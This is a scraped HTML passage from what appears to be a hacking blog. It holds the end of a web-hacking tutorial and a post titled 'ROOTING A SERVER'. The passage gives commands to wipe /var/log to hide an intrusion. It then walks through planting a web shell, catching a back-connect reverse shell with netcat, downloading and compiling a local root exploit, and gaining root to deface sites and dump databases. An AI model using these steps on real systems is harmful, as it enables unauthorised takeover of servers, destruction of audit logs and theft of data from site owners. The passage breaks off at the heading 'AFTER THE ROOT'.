<span style="background-color: white;">/var/log/message: General message and system related stuff<br />/var/log/auth.log: Authenication logs<br />/var/log/kern.log: Kernel logs<br />/var/log/cron.log: Crond logs (cron job)<br />/var/log/maillog: Mail server logs<br />/var/log/qmail/ : Qmail log directory (more files inside this directory)<br />/var/log/httpd/: Apache access and error logs directory<br />/var/log/lighttpd: Lighttpd access and error logs directory<br />/var/log/boot.log : System boot log<br />/var/log/mysqld.log: MySQL database server log file<br />/var/log/secure: Authentication log<br />/var/log/utmp or /var/log/wtmp : Login records file<br />/var/log/yum.log: Yum log files</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">In short /var/log is the location where you should find all Linux logs file.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">To delete all of them by once type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">su root1</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">rm -rf /var/log<br />mkdir /var/log</span></div>
</blockquote>
<h2 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.8em; font-weight: normal; line-height: 1em; margin: 30px 0px 0px; padding: 0px 0px 9px; vertical-align: baseline;">
<span style="background-color: white;">End of this Tutorial:</span></h2>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><strong>This was a great tutorial on Web-Hacking. I reasure you that more hacking tutorials are coming. </strong><br />Great community about hacking at <a href="http://www.hackforuks.net/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Hackforums.net</a></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<br /></div>
<h3 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.5em; font-weight: inherit; line-height: 1em; margin: 8px 0px 18px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">You can also <a href="http://gnahackteam.wordpress.com/2012/07/26/rooting-a-server-without-any-public-local-root-kernel-exploits/" style="border: 0px; color: #cc0000; font-size: 30px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="Rooting a Server without any Public Local Root Kernel Exploits!">check this Post out, if you like this Tutorial….</a></span></h3>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-50840957427614647412013-09-04T22:41:00.002-07:002013-09-04T22:41:42.670-07:00ROOTING A SERVER : LEARN ETHICAL HACKING<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin0jOs9U9p2xDygjq9YETLJPRL7B1tw7BoMai9EHrGjrks4ffIUvcp60OelDMVXQM41JWraNPeAkeAWEWKSpskNozmeGBhxPuCY6nUw7tsW-6lT1FQ3WX4VjbQLV0LXG6jdSRDD3R5xqgr/s1600/rooted24.jpg" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin0jOs9U9p2xDygjq9YETLJPRL7B1tw7BoMai9EHrGjrks4ffIUvcp60OelDMVXQM41JWraNPeAkeAWEWKSpskNozmeGBhxPuCY6nUw7tsW-6lT1FQ3WX4VjbQLV0LXG6jdSRDD3R5xqgr/s400/rooted24.jpg" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="400" /></a></div>
<b style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">What is Root?</b><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Root is the Administrator of all server. If someone got root access he can do anything with server like delete and copy anything on server ; can deface all the home pages (massive deface ).</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">We can't talk about root on windows. That enough for beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to got root.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><b style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">How to get Root?</b><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">There are 3 ways to get ROOT on server :</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">1 – With local Root.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">2 – With SQL by reading same important files on it root password.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">3 – With exploit on software (Buffer Overflow).</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">In this post, we will explain local Root. I will explain the other ways soon in some other post.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">OK, let's back to work.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br />
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOIhrfF5kFlvtdf475vf-94vPsoTc6-KpKZcvebQZraCAX5h-k_Cn5kYnsuRjcx78o-Sa7-i5Xf7solMm7p0RIAj9D0OVlg4GHinjE7WGFMK5jOTH8H65XFykT0hCsqYNdyTIC5lZWaxMo/s1600/shell.png" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOIhrfF5kFlvtdf475vf-94vPsoTc6-KpKZcvebQZraCAX5h-k_Cn5kYnsuRjcx78o-Sa7-i5Xf7solMm7p0RIAj9D0OVlg4GHinjE7WGFMK5jOTH8H65XFykT0hCsqYNdyTIC5lZWaxMo/s400/shell.png" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="400" /></a></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
After Uploading your shell on server and getting the localroot you will do a back connect and run the localroot to Get root . This is a small idea how it work in the next step you will see how to</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
find localroot and run it to get root access .</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<b style="border: 0px; margin: 0px; outline: none; padding: 0px;">How to Search Local root?</b></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
First of all we you need to know what version of Kernel.</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
You can know that from your shell, for example this version is 2.6.18 - 2012</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjREyS_lILZagcToSrG-Ibf5xQmvklJOLO9bmH888zWxdPWoqPpkORfySeaUDgVI9x1uyJGbKUUOxHsfWzuK9qeu64qvJllZy9VLwndqlf26mBHdW4tpdU9l84tXhySChUSEqfZNYrm4qby/s1600/shell1.png" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjREyS_lILZagcToSrG-Ibf5xQmvklJOLO9bmH888zWxdPWoqPpkORfySeaUDgVI9x1uyJGbKUUOxHsfWzuK9qeu64qvJllZy9VLwndqlf26mBHdW4tpdU9l84tXhySChUSEqfZNYrm4qby/s640/shell1.png" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="640" /></a></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Go to EXECUTE on your shell and write "uname -a". You will get the same result, by the way.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Now how to find the local root.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exists two types of local roots :</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">1. Local.C : which are not ready.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">2. Local : ready to use.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><b style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">How to get Root access?</b><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">First you need a shell with a Back Connect option like this :</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br />
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7IGzrtZlRZjCQy7camqr8nCyBYLcI6nTA095JQJLVRmKi_Tsx1md5aisbY8Wuqzb6r0-A5GA1-rbQefpsZtArjCgkTsuizBMX-VuXhEdEqF-mAOVUcUAe3dHw-QcW5AoZ-2RlA2TBmlhQ/s1600/backconet.png" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7IGzrtZlRZjCQy7camqr8nCyBYLcI6nTA095JQJLVRmKi_Tsx1md5aisbY8Wuqzb6r0-A5GA1-rbQefpsZtArjCgkTsuizBMX-VuXhEdEqF-mAOVUcUAe3dHw-QcW5AoZ-2RlA2TBmlhQ/s320/backconet.png" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="320" /></a></div>
<br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Enter your "Public IP Address" in SERVER, port you want to connect on and leave it Perl this time, and Finally connect.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">So now you must receive the back connect with a Tool named netcat u can download it from the</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">net. After that open your terminal if you are under linux or CMD if you are under Windows. I will explain only Linux, and for Windows, its all the same.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><b style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">After that Follow the steps </b><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">:</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">1- Press</span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;"> nc -vlp 433</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwuuKD9-PoKbPSKOTNAs3oS-vxcX1wLQZBbRmOBFloybUGZmkZBbp2wff7k7EISfM3fHGKhTMqST9MNHS3HqTIaLXSKCnwwnCwAm1lRDAGIT9fBD7bXh1Z4neguPsBoCaTbl5WnzeIMQkg/s1600/netcat.png" imageanchor="1" style="background-color: white; border: 0px; clear: left; color: #102c4a; float: left; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px 1em 1em 0px; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwuuKD9-PoKbPSKOTNAs3oS-vxcX1wLQZBbRmOBFloybUGZmkZBbp2wff7k7EISfM3fHGKhTMqST9MNHS3HqTIaLXSKCnwwnCwAm1lRDAGIT9fBD7bXh1Z4neguPsBoCaTbl5WnzeIMQkg/s320/netcat.png" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="320" /></a><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">2- Wget [the link of the local-Root.zip]</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">3 - unzip </span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">local-Root.zip</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">4 - chmod </span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">777 local.c</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">5 - now to change the local-root from </span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">local.c > local</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">gcc local.c -o local </i><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Then you will find local.c transformed to local</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">6 - chmod 777 local</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">7 - ./local to local root work</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">8 – su</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">then see your id </span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">uid=0(root) gid=0(root) groups=0(root)</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;"><br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Getting UID=0 means, u had got root priviledges and hence can do variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br />
<div style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<b style="border: 0px; margin: 0px; outline: none; padding: 0px;">AFTER THE ROOT </b></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
